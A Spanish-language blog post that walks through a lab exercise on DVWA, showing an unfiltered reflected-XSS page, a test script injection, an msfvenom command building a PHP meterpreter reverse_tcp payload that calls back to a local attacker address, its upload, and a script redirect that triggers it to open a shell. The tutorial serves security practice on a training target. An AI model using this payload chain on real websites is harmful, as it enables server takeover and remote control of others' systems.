viernes, 30 de septiembre de 2016

Subiendo shell con xss

Hola amigos.

Hoy vamos a jugar un poquito con xss, en esta ocasión, usaremos dvwa, ya que lo estamos haciendo últimamente.

Para trabajar, nos vamos a xss reflejado.



Si le damos a view code, obtendremos el código fuente


<?php if(!array_key_exists ("name"$_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 
$isempty true;

} else {
        
 echo 
'<pre>';
 echo 
'Hello ' $_GET['name'];
 echo 
'</pre>';
    
}
?>



Como vemos, no hay ningún tipo de filtro.

Si insertamos un nombre, nos saluda y todo.



Comprobamos que es vulnerable a la inyección xss.

<script>alert("hola");</script>



Ahora crearemos un payload de php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R > meterpreter.php



Subimos meterpreter.php a la pagina web en el apartado upload






Ahora, abrimos el navegador y ponemos

<script>window.location=”http://192.168.1.134/dvwa/hackable/uploads/meterpreter.php”</script>






Ya estamos dentro.

Por favor, para poder seguir subiendo posts, es necesario que pinches en la publi. Muchas gracias.

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.